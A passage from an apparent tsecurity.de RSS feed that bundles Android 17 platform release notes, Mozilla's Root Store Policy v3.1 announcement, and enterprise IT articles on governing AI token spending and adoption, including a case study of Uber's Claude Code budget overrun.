<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/s1267/Eyedropper%20Tester.webp"><img border="0" data-original-height="713" data-original-width="1267" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/w640-h360/Eyedropper%20Tester.webp" width="640"></a></div><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><span><span face="Arial, sans-serif"><i>Picking a color from anywhere on the screen with the system EyeDropper</i></span></span></h3><h2>Local network access</h2>
<p>Apps targeting Android 17 now either require the <code><a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network">ACCESS_LOCAL_NETWORK</a></code> runtime permission or the use of system-mediated, privacy-preserving device pickers for local network communication, such as talking to smart home devices or casting receivers. Because <code>ACCESS_LOCAL_NETWORK</code>  falls under the existing <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permission group, users who have already granted other <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permissions will not be prompted again. </p>

<h2>SMS OTP protection</h2>
<p>Android 17 expands SMS one-time-password (OTP) protection by delaying access to SMS messages for three hours:</p>
<ul>
  <li>WebOTP Format: <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">Delayed for all apps that are not the intended recipient (domain mismatch)</a>.</li>
  <li>Standard SMS OTP: <a href="https://developer.android.com/about/versions/17/behavior-changes-17#sms-otp-protection">Delayed for all apps targeting SDK 37+</a>.</li>
  <li>Exemptions: Default SMS, assistant, and connected companion apps are exempt. Apps are strongly encouraged to migrate to the <a href="https://developer.android.com/identity/sms-retriever">SMS Retriever</a> or <a href="https://developers.google.com/identity/sms-retriever/user-consent/overview">SMS User Consent APIs</a>.</li>
</ul>

<h2>Post-Quantum Cryptography (PQC)</h2>
<p>Android 17 is ready for the next generation of cryptographic security:</p>
<ul>
  <li>Keystore Integration: Supported devices can generate ML-DSA (Module-Lattice-Based Digital Signature Algorithm) keys in secure hardware to produce quantum-safe signatures, exposed via standard JCA APIs.</li>
  <li>Hybrid APK Signing: Introducing the v3.2 APK Signature Scheme, which combines classical signatures with ML-DSA signatures to secure app delivery.</li>
</ul>

<h2>Safer native dynamic code loading </h2>
If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14</a> for DEX and JAR files now extends to native libraries. All native files loaded using System.load must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError

<h2>Smarter password protection for physical inputs</h2>
<p>With Android 17, we're making it safer to enter passwords, PINs, and other secrets when using a physical keyboard by no longer showing the last typed character by default.</p>
<p>Users can still easily customize these display settings to match their preferences (availability may vary by device manufacturer).</p>
<p>These enhanced privacy protections are automatically supported byAndroid's built-in SDK components and will be supported in Compose 1.12 for SecureTextFields. </p>

<h3><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s798/Hide%20First%20Letter.gif"><img border="0" data-original-height="449" data-original-width="798" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s16000/Hide%20First%20Letter.gif"></a></div></h3><h3><br></h3><h3><br></h3><h3><br></h3><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><i><div><i>Smarter password protection for physical inputs</i></div></i><div><br></div><h2>Media and camera features that empower creators and delight users
</h2><p>Android 17 introduces new <a href="https://blog.google/products-and-platforms/platforms/android/android-17-creator-features/">creator features</a> that give access to pro-quality cameras and media, all while improving the experience for consumers.</p>

<ul>
  <li><a href="https://developer.android.com/media/platform/integrate-eclipsa-video">Eclipsa Video</a>: HDR video standard built upon the <a href="https://github.com/SMPTE/st2094-50">SMPTE ST 2094-50 specification</a> that introduces new metadata to help devices adapt content for their display headroom and ambient light conditions, as well as improve the simultaneous display of standard and HDR content.</li>
  <li>RAW14 image format: New support for the <a href="https://developer.android.com/reference/kotlin/android/graphics/ImageFormat#raw14">RAW14 image format</a> provides a way for your professional camera app to capture the highest level of detail and color depth from compatible camera sensors.</li>
  <li>Vendor-defined camera extensions: Vendor-defined extensions enable hardware partners to define and implement custom camera extension modes, providing access to the best and latest camera features.</li>
  <li>Extended HE-AAC software encoder: A new system-provided Extended HE-AAC software encoder, supports both low and high bitrates using unified speech and audio coding, providing significantly better audio quality for voice messages in low-bandwidth conditions, including support for loudness metadata.</li>
  <li><a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">Versatile Video Coding (H.266)</a>:  Enables OEMs to add codec support by defining the <a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">video/vvc</a> MIME type in <a href="https://developer.android.com/reference/android/media/MediaFormat"><code>MediaFormat</code></a>, adding new VVC profiles in <a href="https://developer.android.com/reference/android/media/MediaCodecInfo"><code>MediaCodecInfo</code></a>, and integrating support into <a href="https://developer.android.com/reference/android/media/MediaExtractor"><code>MediaExtractor</code></a>.</li>
  <li>Camera device type: New APIs that query the underlying device type to identify if a camera is built-in hardware, an external USB webcam, or a virtual camera.</li>
  <li>Constant Quality for Video Recording: <a href="https://developer.android.com/reference/android/media/MediaRecorder#setVideoEncodingQuality(int)"><code>SetVideoEncodingQuality</code></a> in <a href="https://developer.android.com/reference/android/media/MediaRecorder"><code>MediaRecorder</code></a> configures a constant quality (CQ) mode for video encoders to ensure uniform visual fidelity across the entire video.</li>
</ul>

<h2>Better support for hearing aids</h2>
<ul>
  <li>Bluetooth LE Audio hearing aid support: Android now includes a specific device category for Bluetooth Low Energy (BLE) Audio hearing aids with the new <a href="https://developer.android.com/reference/android/media/AudioDeviceInfo#TYPE_BLE_HEARING_AID"><code>AudioDeviceInfo.TYPE_BLE_HEARING_AID</code></a> constant, so your app can distinguish hearing aids from regular headsets to provide a tailored experience for users with assistive listening devices.</li>
  <li>Granular audio routing for hearing aids: Android 17 allows users to independently manage where specific system sounds are played. They can choose to route notifications, ringtones, and alarms to connected hearing aids or the device's built-in speaker, helping to avoid unwanted in-ear interruptions while maintaining a Bluetooth connection for hearing aid management apps.</li>
</ul>

<h2>CameraX and  Media3</h2>
<p><a href="https://developer.android.com/jetpack/androidx/releases/camerax">CameraX</a> and <a href="https://developer.android.com/jetpack/androidx/releases/media3">Media3</a> have been updated for Android 17. They are there to do the heavy lifting, smoothing the rough edges of media development and simplifying building reliable camera capture,  smooth media playback, and creative and complex editing experiences. </p>

<p>We've released an <a href="https://github.com/android/skills/tree/main/camera">agent skill</a> that can migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.</p>
  
<p>Note: You'll need to update your CameraX version to either 1.5.2 or 1.6.0+ to avoid a crash related to an added dynamic range mode on Android 17 devices.</p>

<h3>Get your apps, libraries, tools, and game engines ready!</h3>
<p>If you develop an Android SDK, library, tool, or game engine, it's critical to prepare any necessary updates now to prevent your downstream app and game developers from being blocked by compatibility issues and allow them to target the latest SDK features. Please let your downstream developers know if updates are needed to fully support Android 17.</p>

<p>Testing involves installing your production app or a test app making use of your library or engine using Google Play or other means onto a device or emulator running Android 17 Beta 4. Work through all your app's flows and look for functional or UI issues. Each release of Android contains platform changes that improve privacy, security, and overall user experience; review the app impacting behavior changes for apps <a href="https://developer.android.com/about/versions/17/behavior-changes-all">running on</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-17">targeting</a> Android 17 to focus your testing, including the following:</p>
<ul>
  <li>Resizability on large screens: Once you target Android 17 (SDK 37), you can no longer opt out of maintaining orientation, resizability and aspect ratio constraints <a href="https://developer.android.com/about/versions/17/changes/ff-restrictions-ignored">on large screens</a>.</li>
  <li>Dynamic code loading: If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14 </a>for DEX and JAR files now extends to native libraries. All native files loaded using System.load() must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError.</li>
  <li>Enable CT by default: <a href="https://developer.android.com/privacy-and-security/security-config#CertificateTransparencySummary">Certificate transparency (CT)</a> is enabled by default. (On Android 16, CT is available but apps had to <a href="https://developer.android.com/privacy-and-security/security-config#certificateTransparency">opt in</a>.)</li>
  <li>Local network protections: Apps targeting SDK 37 or higher have <a href="https://developer.android.com/privacy-and-security/local-network-permission#android-17-enforcement">local network access blocked by default</a>. Switch to using privacy preserving pickers if possible, and use the new <a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network"><b><code>ACCESS_LOCAL_NETWORK</code></b>permission for broad, persistent access.</a></li>
  <li>Background audio hardening: Starting in Android 17, the audio framework enforces <a href="https://developer.android.com/about/versions/17/changes/bg-audio">restrictions on background audio interactions</a> including audio playback, <a href="https://developer.android.com/media/optimize/audio-focus">audio focus</a> requests, and <a href="https://developer.android.com/reference/android/media/AudioManager#adjustStreamVolume(int,%20int,%20int)">volume change</a> APIs. Based on your feedback, we’ve made some changes since beta 2, including targetSDK gating while-in-use FGS enforcement and exempting alarm audio. Full details available in the <a href="https://developer.android.com/about/versions/17/changes/bg-audio">updated guidance</a>.</li>
  <li>NPU access declaration: Apps targeting Android 17 that need to directly access the NPU must declare <a href="https://developer.android.com/reference/kotlin/android/content/pm/PackageManager#feature_neural_processing_unit">FEATURE_NEURAL_PROCESSING_UNIT</a> in their manifest to avoid being blocked from accessing the NPU. This includes apps that use the <a href="https://ai.google.dev/edge/litert/next/npu">LiteRT NPU delegate</a>, vendor-specific SDKs, as well as the deprecated <a href="https://developer.android.com/ndk/guides/neuralnetworks">NNAPI</a>.</li>
</ul>

<h3>Get started with Android 17</h3>
<p>Your Pixel device should get Android 17 shortly if you haven't already been on the Android Beta. If you don’t have a Pixel device, you can <a href="https://developer.android.com/about/versions/17/get#on_emulator">use the 64-bit system images with the Android Emulator</a> in Android Studio. If you are currently on Android 17 Beta 4.1 and have not yet taken an Android 17 QPR1 beta, you can opt out of the program and you will then be offered the release version of Android 17 over the air.</p>
<h3>Getting the Android 17 beta on partner devices</h3>
<p>Android 17 is available in beta on handset, tablet, and foldable form factors <a href="https://developer.android.com/about/versions/17/devices">from partners</a> including Honor, iQOO, Lenovo, OnePlus, OPPO, Realme, Sharp, vivo, and Xiaomi.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s1653/android-17-beta-partners.jpg"><img border="0" data-original-height="624" data-original-width="1653" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s16000/android-17-beta-partners.jpg"></a></div><br><h3><br></h3>

<p>For the best development experience with Android 17, we recommend that you use the latest Canary build of <a href="https://developer.android.com/studio/preview">Android Studio Quail</a>. Once you’re set up, here are some of the things you should do:</p>
<p>Test your current app for compatibility, learn whether your app is <a href="https://developer.android.com/about/versions/17/behavior-changes-all">affected by changes in Android 17</a>, and install your app onto a device or <a href="https://developer.android.com/studio/run/emulator">Android Emulator</a> running Android 17 and extensively test it.</p>

<p>Thank you again to everyone who participated in our Android developer preview and beta program. We're looking forward to seeing how your apps take advantage of the updates in Android 17, and have plans to bring you updates in a fast-paced release cadence going forward.</p>
<p>For complete information on Android 17 please visit the <a href="https://developer.android.com/about/versions/17">Android 17 developer site</a>.</p><br><br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Security Blog: Improving Transparency and Assurance in the Web PKI: Mozilla Root Store Policy v3.1]]></title>
<description><![CDATA[Mozilla remains committed to maintaining a secure, trustworthy, and transparent Web PKI. Today we are announcing the publication of Mozilla Root Store Policy (MRSP) version 3.1, effective July 1, 2026.
While previous policy updates focused heavily on certificate revocation, automation, and operat...]]></description>
<link>https://tsecurity.de/de/3693288/tools/mozilla-security-blog-improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v31/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693288/tools/mozilla-security-blog-improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v31/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:23 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mozilla remains committed to maintaining a secure, trustworthy, and transparent Web PKI. Today we are announcing the publication of <a href="https://www.mozilla.org/en-US/about/governance/policies/security-group/certs/policy/">Mozilla Root Store Policy</a> (MRSP) version 3.1, effective July 1, 2026.</p>
<p>While previous policy updates focused heavily on certificate revocation, automation, and operational resilience, MRSP v3.1 focuses on a different challenge: ensuring that Certification Authority (CA) operations are sufficiently transparent, understandable, and auditable.</p>
<p>Trust in the Web PKI depends not only on technical requirements, but also on the ability of Mozilla, auditors, and the broader community to understand how CA systems are designed, operated, and assessed. MRSP v3.1 introduces new requirements intended to improve the quality of CA documentation and strengthen independent assurance of the design and effectiveness of controls that protect CA systems.</p>
<h3><b>Improving CP/CPS Documentation</b></h3>
<p>Certification Practice Statements (CPSes) and combined Certificate Policy / Certification Practice Statement documents (CP/CPSes) are among the most important public documents published by a CA. They describe how a CA conducts its operations and meets industry requirements.</p>
<p>Over the years, we have seen significant variation in the quality, structure, and level of detail provided in CP/CPS documentation. Some documents provide extensive implementation detail, while others rely heavily on incorporation by reference or provide only high-level descriptions of CA practices.</p>
<p>The revised policy will continue to require conformance with RFC 3647, as modified by applicable CA/Browser Forum requirements. Improvements to section 3.3 in the MRSP will establish clearer expectations regarding the content and quality of CP/CPS documentation. The new requirements emphasize that documentation must be explicit, bounded, auditable, and sufficiently detailed to describe the CA operator’s certificate issuance and management activities, while also establishing requirements for version control, accessibility, and ongoing maintenance. The objective is to ensure that a technically competent reviewer will be better-able to determine what commitments the CA has made, how those commitments are implemented, and whether the documented practices support technical, operational, and performance oversight.</p>
<p>Mozilla believes that these new CP/CPS requirements will improve transparency, reduce misunderstandings, support more effective audits, and help reduce the risk of certificate misissuance by ensuring that operational practices are documented accurately, consistently, and in sufficient detail to permit meaningful review.</p>
<h3><b>Introducing Detailed Controls Reports</b></h3>
<p>A second major enhancement in MRSP v3.1 is the introduction of Detailed Controls Reports (DCRs). Traditional WebTrust and ETSI audit reports provide valuable independent assurance regarding compliance with established criteria. However, they generally provide only limited visibility into the specific controls, testing procedures, and operational environments that support those conclusions.</p>
<p>Beginning with audit periods starting on or after July 1, 2027, CA operators with root certificates enabled for TLS website authentication will be required to obtain a DCR. The purpose of the DCR is to provide CA management, auditors, and Mozilla with greater visibility into the controls, testing, and operating effectiveness of CA systems that support compliance with the CA/Browser Forum’s TLS Baseline Requirements and Network and Certificate System Security Requirements. Mozilla generally expects to review DCRs only on an as-needed basis, such as during compliance reviews, incident investigations, root inclusion evaluations, or other oversight activities.</p>
<p>A DCR must include:</p>
<ul>
<li>The scope and boundaries of the audited CA systems;</li>
<li>Applicable audit criteria;</li>
<li>Controls implemented by the CA;</li>
<li>The auditor’s testing procedures;</li>
<li>Results of control testing; and</li>
<li>Information regarding control exceptions or deficiencies.</li>
</ul>
<p>Mozilla expects that DCRs will complement existing audit reports and strengthen transparency and assurance by providing additional detail regarding system boundaries, control implementation, testing procedures, and control effectiveness that is not typically available in traditional audit reports. Effective compliance requires more than documented policies and successful audits; it also requires management understanding, oversight, and engagement. By providing greater visibility into CA systems, controls, testing activities, and operational risks, DCRs can help reinforce a strong tone at the top regarding compliance expectations, support informed decision-making and resource allocation, enable earlier identification of weaknesses, and promote a culture of continuous improvement. The intent is not to replace existing audit reports, but to provide additional information that supports effective governance, oversight, and informed trust decisions.</p>
<h3><b>Additional Clarifications and Improvements</b></h3>
<p>MRSP v3.1 also includes several targeted clarifications and refinements:</p>
<ul>
<li>aligns Mozilla’s mass revocation planning requirements with the corresponding CA/Browser Forum Baseline Requirements, helping ensure consistency across compliance frameworks;</li>
<li>clarifies audit expectations for root inclusion requests, including requirements relating to audit continuity and root key generation ceremonies;</li>
<li>requires root CA key pairs submitted for inclusion to have been generated within the previous five years, helping ensure that newly included roots are based on contemporary cryptographic practices and controls; and</li>
<li>clarifies expectations when ownership or operational control of a CA changes, helping ensure that Mozilla receives timely notice and can evaluate the impact of acquisitions or organizational changes on continued compliance.</li>
</ul>
<h3><b>Looking Forward</b></h3>
<p>Mozilla recognizes that these changes will require preparation by CA operators, auditors, and other ecosystem participants. To support implementation, Mozilla is publishing accompanying wiki guidance regarding both <a href="https://wiki.mozilla.org/CA/CP-CPS_Guidance">CP/CPS Documentation</a> and <a href="https://wiki.mozilla.org/CA/DCRs">Detailed Controls Reports</a>.</p>
<p>As with previous policy updates, these changes were informed by discussions with CA operators, auditors, and members of the Web PKI community. We appreciate the feedback received during the review process and look forward to continued collaboration as the ecosystem evolves.</p>
<p>Mozilla has a longstanding focus on building confidence in the Web PKI through transparency, accountability, and continuous improvement. By requiring higher-quality CP/CPS documentation and strengthening independent assurance, MRSP v3.1 advances Mozilla’s commitment to protecting its users and maintaining their trust in the systems that help secure the web.</p>
<p>The post <a href="https://blog.mozilla.org/security/2026/06/29/improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v3-1/">Improving Transparency and Assurance in the Web PKI: Mozilla Root Store Policy v3.1</a> appeared first on <a href="https://blog.mozilla.org/security">Mozilla Security Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google is signing the EU AI Act Code of Practice on Transparency of AI-Generated Content.]]></title>
<description><![CDATA[Signing the code reinforces our commitment to transparency and responsible AI development in Europe.]]></description>
<link>https://tsecurity.de/de/3691741/it-nachrichten/google-is-signing-the-eu-ai-act-code-of-practice-on-transparency-of-ai-generated-content/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691741/it-nachrichten/google-is-signing-the-eu-ai-act-code-of-practice-on-transparency-of-ai-generated-content/</guid>
<pubDate>Fri, 24 Jul 2026 16:05:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/GoogleG_FullColor_White_RGB.max-600x600.format-webp.webp">Signing the code reinforces our commitment to transparency and responsible AI development in Europe.]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Fri, 24 Jul 2026 14:04:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691324/it-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Fri, 24 Jul 2026 13:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



